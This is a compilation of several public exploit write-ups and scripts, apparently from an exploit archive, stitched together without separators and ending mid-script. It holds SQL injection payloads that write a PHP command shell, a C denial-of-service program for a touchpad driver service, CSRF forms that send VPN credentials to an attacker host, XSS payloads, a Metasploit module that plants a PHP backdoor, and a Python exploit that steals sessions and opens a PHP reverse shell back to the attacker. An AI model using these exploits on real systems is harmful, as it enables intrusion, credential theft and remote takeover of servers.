Host: 192.168.0.210
Cache-Control: max-age=0
User-Agent: Toucher/1.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://192.168.0.210/deltaweb/hmi_userconfig.asp
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: Previous=; lastLoaded=; LastUser=DELTA; LogoutTime=10; UserInstance=1; UserName=DELTA; Password=LOGIN; LastGraphic=; LastObjRef=; AccessKey=DADGGEOFNILEJMBBCNDKFNJPHPPJDAEDGEBJACPEAPBHDCGPCAGNNDEOJIJEOPPLOEKCFMAFNHDJPHGACMDFMPFDNONPIJAHBBNAAIDMDHCCPMAJDELDNLOPBPDCKELJADDKICPMMPCNEOMBHMKIIBJHFAJKNKJFGDEOLPMGMNBEHFLNEDIFMJKMCJKBHPGGEMHJJGMOMAECDKDIIKGNDDGANIHDKPNACLMANGJAOBDNJCFGEIHIJICLPGOFFMDOOLOJCJPAPPKOJFCKFAHDDAGNLCAHKKKGHCBODHBNDCOECGHG
Connection: close
Exploit Title: delpino73 Blue-Smiley-Organizer 1.32 - 'datetime' SQL Injection
Date: 2019-10-28
Exploit Author: Cakes
Vendor Homepage: https://github.com/delpino73/Blue-Smiley-Organizer
Software Link: https://github.com/delpino73/Blue-Smiley-Organizer.git
Version: 1.32
Tested on: CentOS7
CVE : N/A
# PoC: Multiple SQL Injection vulnerabilities
# Nice and easy SQL Injection
Parameter: datetime (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: datetime=2019-10-27 10:53:00' AND 6315=(SELECT (CASE WHEN (6315=6315) THEN 6315 ELSE (SELECT 3012 UNION SELECT 2464) END))-- sQtq&title=tester&category_id=1&new_category=&text=test2&public=1&save=Save Note
Vector: AND [RANDNUM]=(SELECT (CASE WHEN ([INFERENCE]) THEN [RANDNUM] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))[GENERIC_SQL_COMMENT]
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: datetime=2019-10-27 10:53:00' AND (SELECT 7239 FROM (SELECT(SLEEP(5)))wrOx)-- cDKQ&title=tester&category_id=1&new_category=&text=test2&public=1&save=Save Note
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
# Pop a PHP CMD Shell
' LIMIT 0,1 INTO OUTFILE '/Path/To/Folder/upload/exec.php' LINES TERMINATED BY 0x3c3f7068702024636d64203d207368656c6c5f6578656328245f4745545b27636d64275d293b206563686f2024636d643b203f3e-- -
/*
Title: Dell Touchpad - ApMsgFwd.exe Denial Of Service
Author: Souhail Hammou
Vendor Homepage: https://www.alps.com/
Tested on : Alps Pointing-device Driver 10.1.101.207
CVE: CVE-2018-10828
*/
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
/*
Details:
==========
ApMsgFwd.exe belonging to Dell Touchpad, ALPS Touchpad driver, ALPS pointing-device for VAIO, Thinkpad Ultranav Driver ..etc
allows the current user to map and write to the "ApMsgFwd File Mapping Object" section.
ApMsgFwd.exe uses the data written to the section as arguments to functions.
This causes a denial of service condition when invalid pointers are written to the mapped section.
The crash :
===========
(b88.aa0): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
KERNELBASE!MultiByteToWideChar+0x3d8:
00007ffc`06422e08 443830 cmp byte ptr [rax],r14b ds:d05d05d0`5d05d05d=??
0:004> r
rax=d05d05d05d05d05d rbx=00000000000004e4 rcx=000000007fffffff
rdx=0000000000000000 rsi=00000000ffffffff rdi=d05d05d05d05d05d
rip=00007ffc06422e08 rsp=000000000272fae0 rbp=000000000272fb59
r8=0000000000000000 r9=00000000ffffffff r10=0000000000000000
r11=000000000272fbc0 r12=00000000000001f4 r13=0000000000000000
r14=0000000000000000 r15=0000000000563e40
iopl=0 nv up ei pl zr na po nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010246
KERNELBASE!MultiByteToWideChar+0x3d8:
00007ffc`06422e08 443830 cmp byte ptr [rax],r14b ds:d05d05d0`5d05d05d=??
0:001> lm v m ApMsgFwd
Browse full module list
start end module name
00000000`00400000 00000000`00415000 ApMsgFwd (no symbols)
Loaded symbol image file: C:\Program Files\DellTPad\ApMsgFwd.exe
Image path: C:\Program Files\DellTPad\ApMsgFwd.exe
Image name: ApMsgFwd.exe
Browse all global symbols functions data
Timestamp: Tue Jul 1 09:03:05 2014 (53B27949)
CheckSum: 00020F5D
ImageSize: 00015000
File version: 8.1.0.44
Product version: 8.1.0.44
File flags: 0 (Mask 3F)
File OS: 40004 NT Win32
File type: 1.0 App
File date: 00000000.00000000
Translations: 0411.04b0
CompanyName: Alps Electric Co., Ltd.
ProductName: ApMsgFwd
InternalName: ApMsgFwd
OriginalFilename: ApMsgFwd.exe
ProductVersion: 8, 1, 0, 44
FileVersion: 8, 1, 0, 44
PrivateBuild: 8, 1, 0, 44
SpecialBuild: 8, 1, 0, 44
FileDescription: ApMsgFwd
LegalCopyright: Copyright (C) 2006-2014 Alps Electric Co., Ltd.
LegalTrademarks: Copyright (C) 2006-2014 Alps Electric Co., Ltd.
Comments: Copyright (C) 2006-2014 Alps Electric Co., Ltd.
*/
int main(int argc, char** argv)
{
HANDLE ApMpHnd,StartEvtHnd,KeyHnd;
PBYTE MappedBuf;
if ( ! (ApMpHnd = OpenFileMappingA(FILE_MAP_WRITE,FALSE,"ApMsgFwd File Mapping Object") ) )
{
printf("OpenFileMapping Failed !\n");
goto ret;
}
if ( ! ( MappedBuf = MapViewOfFile(ApMpHnd,FILE_MAP_WRITE,0,0,0x1A0) ) )
{
printf("MapViewOfFile Failed !\n");
goto cleanup_0;
}
StartEvtHnd = OpenEventA(EVENT_MODIFY_STATE,FALSE,"ApMsgFwd Event Start");
if ( ! StartEvtHnd )
{
printf("OpenEvent Failed !\n");
goto cleanup_1;
}
ZeroMemory(MappedBuf,0x1A0);
*MappedBuf = 9; //switch case 9
*(DWORD*)(MappedBuf + 0x60) = 0x5D05D05D;
*(DWORD*)(MappedBuf + 0x64) = 0xD05D05D0;
/*Wake up the waiting thread*/
SetEvent(StartEvtHnd);
CloseHandle(StartEvtHnd);
cleanup_1:
UnmapViewOfFile(MappedBuf);
cleanup_0:
CloseHandle(ApMpHnd);
ret:
return 0;
}
# Exploit Title: Dell SonicWALL Secure Remote Access (SRA) Appliance Cross-Site Request Forgery
# Date: 04/28/2015
# Exploit Author: Veit Hailperin
# Vendor Homepage: www.dell.com
# Version: Dell SonicWALL SRA 7.5 prior to 7.5.1.0-38sv and 8.0 prior to 8.0.0.1-16sv
# CVE : 2015-2248
Exploitation Procedure (Outline):
1. Use CSRF to force currently logged in user to create a bookmark pointing to an endpoint controlled by the attacker.
2. Use subsequent request to call the bookmark just created. The identifier of the bookmark can be bruteforced using a single decrementing integer and causes minimal time delay.
3. Gather the credentials on the target server provided in step #1
1. Create a bookmark:
<html>
<body>
<form action="https://vulnerable.vpn-installation.tld/cgi-bin/editBookmark" method="POST">
<input type="hidden" name="bmName" value="foo" />
<input type="hidden" name="host" value="www.malicious-host.tld" />
<input type="hidden" name="description" value="bar" />
<input type="hidden" name="tabs" value="Baz" />
<input type="hidden" name="service" value="HTTP" />
<input type="hidden" name="fbaSSOEnabled" value="on" />
<input type="hidden" name="fbaSSOFormUserName" value="user" />
<input type="hidden" name="fbaSSOFormUserPassword" value="password" />
<input type="hidden" name="MC_App" value="inherit" />
<input type="hidden" name="MC_Copy" value="inherit" />
<input type="hidden" name="MC_Print" value="inherit" />
<input type="hidden" name="MC_Offline" value="inherit" />
<input type="hidden" name="name" value="name" />
<input type="hidden" name="type" value="type" />
<input type="hidden" name="owner" value="owner" />
<input type="hidden" name="cmd" value="add" />
<input type="hidden" name="wantBmData" value="true" />
<input type="hidden" name="ok" value="OK" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
2. Call the newly created bookmark
This might require some guesswork, because we don't know which value bookmarkAccessed needs to have.
<html>
<body>
<form action="https://vulnerable.vpn-installation.tld/cgi-bin/http">
<input type="hidden" name="HOST" value="www.malicious-host.tld" />
<input type="hidden" name="bookmarkAccessed" value="4" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
3. Set up a listener
E.g. metasploit payload
use auxiliary/server/capture/http_basic
msf auxiliary(http_basic) >
[*] Listening on 0.0.0.0:80...
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://www.malicious-host.tld:80/
[*] Server started.
[*] vulnerable.vpn-installation.tld http_basic - Sending 401 to client vulnerable.vpn-installation.tld
[+] vulnerable.vpn-installation.tld http_basic - vulnerable.vpn-installation.tld - Credential collected: "user:password"
Dell SonicWALL Secure Mobile Access SMA 8.1 XSS And WAF CSRF
Vendor: Dell Inc.
Product web page: https://www.sonicwall.com/products/secure-mobile-access/
Affected version: 8.1 (SSL-VPN)
Summary: Keep up with the demands of today’s remote workforce. Enable secure
mobile access to critical apps and data without compromising security. Choose
from a variety of scalable secure mobile access (SMA) appliances and intuitive
Mobile Connect apps to fit every size business and budget.
Desc: SonicWALL SMA suffers from a XSS issue due to a failure to properly sanitize
user-supplied input to several parameters. Attackers can exploit this weakness
to execute arbitrary HTML and script code in a user's browser session. The WAF was
bypassed via form-based CSRF.
Tested on: SonicWALL SSL-VPN Web Server
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5392
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5392.php
Firmware fixed: 8.1.0.3
Issue ID: 172692
http://documents.software.dell.com/sonicwall-sma-100-series/8.1.0.3/release-notes/resolved-issues?ParentProduct=869
26.01.2016
--
Reflected XSS via protocol parameter (GET):
-------------------------------------------
https://127.0.0.1/cgi-bin/ftplauncher?protocol=sftp:</script><img%20src=a%20onerror=confirm(1)>&bmId=55
XSS via arbitrary parameter (GET):
----------------------------------
https://127.0.0.1/cgi-bin/handleWAFRedirect?hdl=VqjLncColvAAAF4QB2YAAAAT&<script>alert(2)</script>=zsl
XSS via REMOTEPATH parameter (GET):
-----------------------------------
https://127.0.0.1/cgi-bin/soniclauncher?REMOTEPATH=//servername/share/</script><img%20src=a%20onerror=confirm(3)>&bmId=59
WAF Cross-Site Request Forgery PoC:
-----------------------------------
POST /cgi-bin/editBookmark HTTP/1.1
Host: 127.0.0.1
bmName=%2522%253e%253c%2573%2563%2572%2569%2570%2574%253e%2561%256c%2565%2572%2574%2528%2533%2529%253c%252f%2573%2563%2572%2569%2570%2574%253e%250a&host=2&description=3&tabs=4&service=HTTP&screenSize=4&screenSizeHtml5=4&colorSize=3&macAddr=&wolTime=90&apppath=&folder=&appcmdline=&tsfarmserverlist=&langsel=1&redirectclipboard=on&displayconnectionbar=on&autoreconnection=on&bitmapcache=on&themes=on&rdpCompression=on&audiomode=3&rdpExperience=1&rdpServerAuthFailAction=2&charset=UTF-8&sshKeyFile=&defaultWindowSize=1&kexAlgoList=0%2C1%2C2&cipherAlgoList=&hmacAlgoList=&citrixWindowSize=1&citrixWindowWidth=0&citrixWindowHeight=0&citrixWindowPercentage=0&citrixLaunchMethod=Auto&forceInstalledCheckbox=on&icaAddr=&vncEncoding=0&vncCompression=0&vncCursorShapeUpdates=0&vncUseCopyrect=on&vncRestrictedColors=on&vncShareDesktop=on&MC_App=inherit&MC_Copy=inherit&MC_Print=inherit&MC_Offline=inherit&name=1%22+javascript%3Aconfirm(251)%3B&type=user&owner=zslab&cmd=edit&parentBmId=0&ownerdomain=ZSLAB&serviceManualConfigList=undefined&wantBmData=true&swcctn=1NcP8JhUY10emue9YQpON1p2c%3D6P0c9P&ok=OK
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
include Msf::Exploit::EXE
WINDOWS = /^win/i
LINUX = /linux/i
def initialize(info={})
super(update_info(info,
'Name' => "Dell SonicWALL Scrutinizer 11.01 methodDetail SQL Injection",
'Description' => %q{
This module exploits a vulnerability found in Dell SonicWALL Scrutinizer. The methodDetail
parameter in exporters.php allows an attacker to write arbitrary files to the file system
with an SQL Injection attack, and gain remote code execution under the context of SYSTEM
for Windows, or as Apache for Linux.
Authentication is required to exploit this vulnerability, but this module uses
the default admin:admin credential.
},
'License' => MSF_LICENSE,
'Author' =>
[
'bperry', # Original discovery, PoC, and Metasploit module
'sinn3r' # Metasploit module for native support
],
'References' =>
[
[ 'CVE', '2014-4977' ],
[ 'BID', '68495' ],
[ 'URL', 'http://seclists.org/fulldisclosure/2014/Jul/44' ],
[ 'URL','https://gist.github.com/brandonprry/76741d9a0d4f518fe297' ]
],
'Arch' => [ ARCH_X86 ],
'Platform' => [ 'win', 'linux' ],
'Targets' =>
[
[ 'Automatic', {} ],
[
'Dell SonicWALL Scrutinizer 11.01 on Windows',
{
'Arch' => ARCH_X86,
'Platform' => 'win',
}
],
[
'Dell SonicWALL Scrutinizer 11.01 Linux Appliance',
{
'Arch' => ARCH_X86,
'Platform' => 'linux'
}
]
],
'Privileged' => false,
'DisclosureDate' => 'Jul 24 2014',
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [ true, "Base Application path", "/" ]),
OptString.new('USERNAME', [ true, 'The username to authenticate as', 'admin' ]),
OptString.new('PASSWORD', [ true, 'The password to authenticate with', 'admin' ])
], self.class)
end
# Prints a message with the target's IP and port.
#
# @param msg [String] Message to print.
# @return [void]
def print_status(msg='')
super("#{peer} - #{msg}")
end
# Prints an error message with the target's IP and port.
#
# @param msg [String] Message to print.
# @return [void]
def print_error(msg='')
super("#{peer} - #{msg}")
end
# Pads NULL columns for a SQL injection string.
#
# @param n [Fixnum] Number of nulls
# @return [String]
def pad_null(n)
padding = []
n.times do
padding << 'NULL'
end
padding * ','
end
# Checks (explicitly) the target for the vulnerability. To be able to check this, a
# valid username/password is required.
#
# @return [void]
def check
begin
res = do_login
rescue Msf::Exploit::Failed => e
vprint_error(e.message)
return Exploit::CheckCode::Unknown
end
uid = res['userid']
sid = res['sessionid']
pattern = Rex::Text.rand_text_alpha(10)
sqli_str = "-6045 UNION ALL SELECT '#{pattern}',#{pad_null(19)}"
res = do_sqli(sqli_str, sid, uid).get_json_document
return Exploit::CheckCode::Vulnerable if res['id'].to_s == pattern
Exploit::CheckCode::Safe
end
# Returns the OS information by using @@version_compile_os.
#
# @param sid [String] Session ID.
# @param uid [String] User ID.
# @return [String] The OS information.
def get_os(sid, uid)
sqli_str = "-6045 UNION ALL SELECT @@version_compile_os,#{pad_null(19)}"
res = do_sqli(sqli_str, sid, uid).get_json_document
res['id']
end
# Returns target's d4d directory path that will be used to upload our malicious files.
#
# @param os [String] OS information.
# @return [String]
def get_d4d_path(os)
case os
when WINDOWS
# On Windows, the full d4d path looks something like this:
# C:\Program Files\Scrutinizer\html\d4d
'../../html/d4d'
when LINUX
# On the Linux appliance, the d4d path looks exactly like this:
'/home/plixer/scrutinizer/html/d4d'
end
end
# Logs into Dell SonicWALL Scrutinizer.
#
# @return [Hash] JSON response.
def do_login
res = send_request_cgi({
'uri' => normalize_uri(target_uri, '/cgi-bin/login.cgi'),
'vars_get' => {
'name' => datastore['USERNAME'],
'pwd' => datastore['PASSWORD']
}
})
unless res
fail_with(Failure::Unknown, 'The connection timed out while attempting to log in.')
end
res = res.get_json_document
if res['noldapnouser']
fail_with(Failure::NoAccess, "Username '#{datastore['USERNAME']}' is incorrect.")
elsif res['loginfailed']
fail_with(Failure::NoAccess, "Password '#{datastore['PASSWORD']}' is incorrect.")
end
report_cred(datastore['USERNAME'], datastore['PASSWORD'])
res
end
# Saves a valid username/password to database.
#
# @param username [String]
# @param password [String]
# @return [void]
def report_cred(username, password)
service_data = {
address: rhost,
port: rport,
service_name: ssl ? 'https' : 'http',
protocol: 'tcp',
workspace_id: myworkspace_id
}
credential_data = {
module_fullname: self.fullname,
origin_type: :service,
username: username,
private_data: password,
private_type: :password
}.merge(service_data)
credential_core = create_credential(credential_data)
login_data = {
core: credential_core,
last_attempted_at: DateTime.now,
status: Metasploit::Model::Login::Status::SUCCESSFUL
}.merge(service_data)
create_credential_login(login_data)
end
# Injects malicious SQL string to the methodDetail parameter against the target machine.
#
# @param method_detail [String] Malicious SQL injection string.
# @param sid [String] Session ID.
# @param uid [String] User ID.
# @return [Rex::Proto::Http::Response]
def do_sqli(method_detail, sid, uid)
res = send_request_cgi({
'uri' => normalize_uri(target_uri, '/d4d/exporters.php'),
'vars_get' => { 'methodDetail'=> method_detail },
'cookie' => "cookiesenabled=1;sessionid=#{sid};userid=#{uid}"
})
unless res
fail_with(Failure::Unknown, 'The connection timed out for exporters.php.')
end
res
end
# Returns a PHP backdoor that is to be uploaded onto the target machine.
#
# @param os [String] Target OS information.
# @param target_path [String]
# @return [String] PHP backdoor
def get_php_backdoor(os)
case os
when WINDOWS
chmod_code = %Q|chmod($bname, 0777);|
exec_code = %Q|exec($bname);|
when LINUX
chmod_code = %Q|chmod("./" . $bname, 0777);|
exec_code = %Q|exec("./" . $bname);|
end
%Q|<?php
$bname = basename( $_FILES['uploadedfile']['name']);
$target_path = "./" . $bname;
move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path);
#{chmod_code}
#{exec_code}
?>
|.gsub(/\x20{4}/, ' ')
end
# Uploads the executable payload via malicious PHP backdoor.
#
# @param backdoor_fname [String] Name of the backdoor
# @param payload_fname [String] Name of the executable payload
# @return [void]
def upload_payload(backdoor_fname, payload_fname)
p = generate_payload_exe(
code: payload.encoded,
platform: @my_target.platform,
arch: @my_target.arch
)
print_status("Uploading #{payload_fname} (#{p.length} bytes)...")
post_data = Rex::MIME::Message.new
post_data.add_part(
p,
'application/octet-stream',
'binary',
"form-data; name=\"uploadedfile\"; filename=\"#{payload_fname}\""
)
data = post_data.to_s
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(target_uri, "/d4d/#{backdoor_fname}"),
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'data' => data
})
unless res
# Here we are not using fail_with, because when we get a session, it seems to be creating
# the same effect as connection hanging... and then eventually times out. If that
# happens, a fail_with() can cause msfconsole to believe there is no session created.
vprint_status('Connection timed out while uploading payload.')
return
end
if res.code == 404
fail_with(Failure::Unknown, "Server returned 404 for #{backdoor_fname}.")
end
end
# Uploads the PHP backdoor onto the target machine. The reason of using a PHP backdoor to upload
# is because our SQL injection is in a GET method, and Apache has a max length of 8190 bytes,
# which is bad for some built-in or custom payloads.
#
# @param opts [Hash]
# @option opts [String] :d4d_path
# @option opts [String] :backdoor_fname
# @option opts [String] :payload_fname
# @option opts [String] :sid
# @option opts [String] :uid
# @option opts [String] :os
# @return [void]
def upload_php_backdoor(opts)
d4d_path = opts[:d4d_path]
backdoor_fname = opts[:backdoor_fname]
payload_fname = opts[:payload_fname]
sid = opts[:sid]
uid = opts[:uid]
os = opts[:os]
print_status("Injecting a PHP upload backdoor (#{backdoor_fname})...")
hex_backdoor = get_php_backdoor(os).unpack("H*")[0]
sqli_str = "-6045 UNION ALL SELECT 0x#{hex_backdoor},#{pad_null(19)} INTO DUMPFILE '#{d4d_path}/#{backdoor_fname}' #"
do_sqli(sqli_str, sid, uid)
end
# Attempts a SQL injection attack against the target machine.
#
# @param os [String] OS information.
# @param sid [String] Session ID.
# @param uid [String] User ID.
# @return [void]
def do_backdoor_sqli(os, sid, uid)
backdoor_fname = "#{Rex::Text.rand_text_alpha(6)}.php"
payload_fname = Rex::Text.rand_text_alpha(5)
payload_fname << '.exe' if @my_target['Platform'].match(WINDOWS)
d4d_path = get_d4d_path(os)
register_files_for_cleanup(backdoor_fname, payload_fname)
opts = {
d4d_path: d4d_path,
backdoor_fname: backdoor_fname,
payload_fname: payload_fname,
sid: sid,
uid: uid,
os: os
}
upload_php_backdoor(opts)
upload_payload(backdoor_fname, payload_fname)
end
# Tries to set the target. If the user manually set one, then avoid automatic target.
#
# @param os [String] OS information.
# @return [void]
def try_set_target(os)
@my_target = target if target != targets[0]
case os
when WINDOWS
@my_target = targets[1]
when LINUX
@my_target = targets[2]
else
fail_with(Failure::NoTarget, 'Unsupported target')
end
end
# Exploits the target machine. To do this, first we must log into the system in order to obtain
# the user ID and session ID. After logging in, we can ask the vulnerable code to upload a
# malicious PHP backdoor, and then finally use that backdoor to upload and execute our payload.
def exploit
res = do_login
uid = res['userid']
sid = res['sessionid']
os = get_os(sid, uid)
print_status("Detected OS information: #{os}")
try_set_target(os)
do_backdoor_sqli(os, sid, uid)
end
end
#!/usr/local/bin/python
"""
Dell SonicWall Scrutinizer <= 11.0.1 setUserSkin/deleteTab SQL Injection Remote Code Execution
sonic.py by mr_me@offensive-security.com
greets to @brandonprry ;->
Summary:
========
This exploits an pre-auth SQL Injection in the login.php script within an update statement to steal session data. You could also steal login creds
which require absolutely no hash cracking since the target uses symmetric encryption. It then exploits a second post-auth SQL Injection vulnerability
that writes a shell to the target using a relative path and gets SYSTEM.
Vulnerability:
==============
In html/d4d/login.php on lines 27-34:
}else if ($_REQUEST['setSkin']){
echo setUserSkin(
array(
'db' => $db,
'user_id' => $_REQUEST['user_id'],
'skin' => $_REQUEST['setSkin']
)
);
Then, on lines 46-62:
function setUserSkin($args){
$db = $args['db'];
$result = $db->query("
UPDATE plixer.userpreferences
SET setting = '$args[skin]'
WHERE prefCode = 'skin'
AND users_id = $args[user_id]");
if ($args['user_id'] == 1){
$result2 = $db->query("
UPDATE plixer.serverprefs
SET currentVal = '$args[skin]'
WHERE langKey = 'skin'");
}
}
For the post-auth bug, see https://gist.github.com/brandonprry/76741d9a0d4f518fe297
Example:
========
saturn:module-03 mr_me$ ./sonic.py
Dell SonicWall Scrutinizer <= 11.0.1 setUserSkin/deleteTab SQLi Explo!t
mr_me@offensive-security.com
(!) usage: ./poc.py <target> <connectback:port>
saturn:module-03 mr_me$ ./poc.py 172.16.175.147 172.16.175.1:1111
Dell SonicWall Scrutinizer <= 11.0.1 setUserSkin/deleteTab SQLi Explo!t
mr_me@offensive-security.com
(+) target is vuln, proceeding
(+) waiting for session data... starting at: 2016-05-06 16:31:37.022818
(+) awesome, appears like someone has logged in...
(+) it took 0:00:05.020670 to detect valid session data
(+) extracting session data... 1:NfS5yetP49TXCqP5
(+) backdooring target...
(+) starting handler on port 1111
(+) connection from 172.16.175.147
(+) pop thy shell!
whoami
nt authority\system
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . : localdomain
IP Address. . . . . . . . . . . . : 172.16.175.147
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 172.16.175.2
*** Connection closed by remote host ***
"""
import re
import sys
import requests
import datetime
import socket
import telnetlib
import email.utils as eut
from threading import Thread
from base64 import b64encode as b64e
lower_value = 0
upper_value = 126
def banner():
return """\n\tDell SonicWall Scrutinizer <= 11.0.1 setUserSkin/deleteTab SQLi Explo!t\n\tmr_me@offensive-security.com\n"""
def ct():
return datetime.datetime.now()
def parsedate(text):
return datetime.datetime(*eut.parsedate(text)[:6])
def check_args():
global target, lserver, lport
if len(sys.argv) < 3:
return False
cb = sys.argv[2]
target = "http://%s" % sys.argv[1]
if not ":" in cb:
return False
if not cb.split(":")[1].isdigit():
return False
lserver = cb.split(":")[0]
lport = int(cb.split(":")[1])
return True
def validate():
r = requests.get("%s/index.html" % target)
if re.search('Scrutinizer 11.0.1', r.text):
return True
return False
def have_sessions(time):
"""
check if we have sessions
"""
sqli = "if(ascii(substring((select count(session_id) from sessions),1,1))!=48,sleep(%s),null)" % (time)
url = "d4d/login.php?setSkin=1&user_id=setSkin=1&user_id=%s" % sqli
st = ct()
r = requests.get("%s/%s" % (target, url))
delta = ct()-st
if int(delta.seconds) < time:
return False
return True
def do_time_based_blind(sql, time):
lower = lower_value
upper = upper_value
while lower < upper:
try:
mid = (lower + upper) / 2
url = "%s/%s" % (target, ("%s>%s,sleep(%s),null)" % (sql, str(mid), time)))
st = ct()
r = requests.get(url)
delta = ct()-st
if int(delta.seconds) >= time:
lower = mid + 1
else:
upper = mid
except (KeyboardInterrupt, SystemExit):
raise
except:
pass
if lower > lower_value and lower < upper_value:
value = lower
else:
url = "%s/%s" % (target, ("%s=%s,sleep(%s),null)" % (sql, str(lower), time)))
st = ct()
r = requests.get(url)
delta = ct()-st
if int(delta.seconds) >= time:
value = lower
return value
def steal_session_length():
xlen = ""
sqli = "if(ascii(substring((select length(length(concat(user_id,0x3a,session_id))) from sessions limit 0,1),1,1))"
qry_str = "d4d/login.php?setSkin=1&user_id=setSkin=1&user_id=%s" % sqli
zlen = int(chr(do_time_based_blind(qry_str, 5)))
for i in range(0, zlen):
sqli = "if(ascii(substring((select length(concat(user_id,0x3a,session_id)) from sessions limit 0,1),%d,1))" % (i+1)
qry_str = "d4d/login.php?setSkin=1&user_id=setSkin=1&user_id=%s" % sqli
xlen += chr(do_time_based_blind(qry_str, 5))
return int(xlen)
def steal_session(length, time):
session = ""
for i in range(0, length):
sqli = "if(ascii(substring((select concat(user_id,0x3a,session_id) from sessions limit 0,1),%d,1))" % (i+1)
qry_str = "d4d/login.php?setSkin=1&user_id=setSkin=1&user_id=%s" % sqli
char = chr(do_time_based_blind(qry_str, 5))
session += char
sys.stdout.write(char)
sys.stdout.flush()
return session
# build the reverse php shell
def build_php_code():
phpkode = ("""
@set_time_limit(0); @ignore_user_abort(1); @ini_set('max_execution_time',0);""")
phpkode += ("""$dis=@ini_get('disable_functions');""")
phpkode += ("""if(!empty($dis)){$dis=preg_replace('/[, ]+/', ',', $dis);$dis=explode(',', $dis);""")
phpkode += ("""$dis=array_map('trim', $dis);}else{$dis=array();} """)
phpkode += ("""if(!function_exists('LcNIcoB')){function LcNIcoB($c){ """)
phpkode += ("""global $dis;if (FALSE !== strpos(strtolower(PHP_OS), 'win' )) {$c=$c." 2>&1\\n";} """)
phpkode += ("""$imARhD='is_callable';$kqqI='in_array';""")
phpkode += ("""if($imARhD('popen')and!$kqqI('popen',$dis)){$fp=popen($c,'r');""")
phpkode += ("""$o=NULL;if(is_resource($fp)){while(!feof($fp)){ """)
phpkode += ("""$o.=fread($fp,1024);}}@pclose($fp);}else""")
phpkode += ("""if($imARhD('proc_open')and!$kqqI('proc_open',$dis)){ """)
phpkode += ("""$handle=proc_open($c,array(array(pipe,'r'),array(pipe,'w'),array(pipe,'w')),$pipes); """)
phpkode += ("""$o=NULL;while(!feof($pipes[1])){$o.=fread($pipes[1],1024);} """)
phpkode += ("""@proc_close($handle);}else if($imARhD('system')and!$kqqI('system',$dis)){ """)
phpkode += ("""ob_start();system($c);$o=ob_get_contents();ob_end_clean(); """)
phpkode += ("""}else if($imARhD('passthru')and!$kqqI('passthru',$dis)){ob_start();passthru($c); """)
phpkode += ("""$o=ob_get_contents();ob_end_clean(); """)
phpkode += ("""}else if($imARhD('shell_exec')and!$kqqI('shell_exec',$dis)){ """)
phpkode += ("""$o=shell_exec($c);}else if($imARhD('exec')and!$kqqI('exec',$dis)){ """)
phpkode += ("""$o=array();exec($c,$o);$o=join(chr(10),$o).chr(10);}else{$o=0;}return $o;}} """)
phpkode += ("""$nofuncs='no exec functions'; """)
phpkode += ("""if(is_callable('fsockopen')and!in_array('fsockopen',$dis)){ """)
phpkode += ("""$s=@fsockopen('tcp://%s','%d');while($c=fread($s,2048)){$out = ''; """ % (lserver, lport))
phpkode += ("""if(substr($c,0,3) == 'cd '){chdir(substr($c,3,-1)); """)
phpkode += ("""}elseif (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit'){break;}else{ """)
phpkode += ("""$out=LcNIcoB(substr($c,0,-1));if($out===false){fwrite($s,$nofuncs); """)
phpkode += ("""break;}}fwrite($s,$out);}fclose($s);}else{ """)
phpkode += ("""$s=@socket_create(AF_INET,SOCK_STREAM,SOL_TCP);@socket_connect($s,'%s','%d'); """ % (lserver, lport))
phpkode += ("""@socket_write($s,"socket_create");while($c=@socket_read($s,2048)){ """)
phpkode += ("""$out = '';if(substr($c,0,3) == 'cd '){chdir(substr($c,3,-1)); """)
phpkode += ("""} else if (substr($c,0,4) == 'quit' || substr($c,0,4) == 'exit') { """)
phpkode += ("""break;}else{$out=LcNIcoB(substr($c,0,-1));if($out===false){ """)
phpkode += ("""@socket_write($s,$nofuncs);break;}}@socket_write($s,$out,strlen($out)); """)
phpkode += ("""}@socket_close($s);} """)
return phpkode
def kill_shot(stolen_data):
user_id = stolen_data.split(":")[0]
sessionid = stolen_data.split(":")[1]
url = "d4d/dashboards.php?deleteTab=1 union select '<?php eval(base64_decode($_COOKIE[\\'awae\\'])); ?>' into outfile '../../html/d4d/offsec.php'"
requests.get("%s/%s" % (target, url), cookies={"userid": user_id, "sessionid": sessionid})
def exec_code():
phpkodez = b64e(build_php_code())
handlerthr = Thread(target=handler, args=(lport,))
handlerthr.start()
requests.get("%s/d4d/offsec.php" % (target), cookies={"awae": phpkodez})
def handler(lport):
print "(+) starting handler on port %d" % lport
t = telnetlib.Telnet()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("0.0.0.0", lport))
s.listen(1)
conn, addr = s.accept()
print "(+) connection from %s" % addr[0]
t.sock = conn
print "(+) pop thy shell!"
t.interact()
def main():
if check_args():
if validate():
print "(+) target is vuln, proceeding"
st = ct()
print "(+) waiting for session data... starting at: %s" % ct()
# we dont use recursion since we could get stack exhaustion.
while not have_sessions(5):
pass
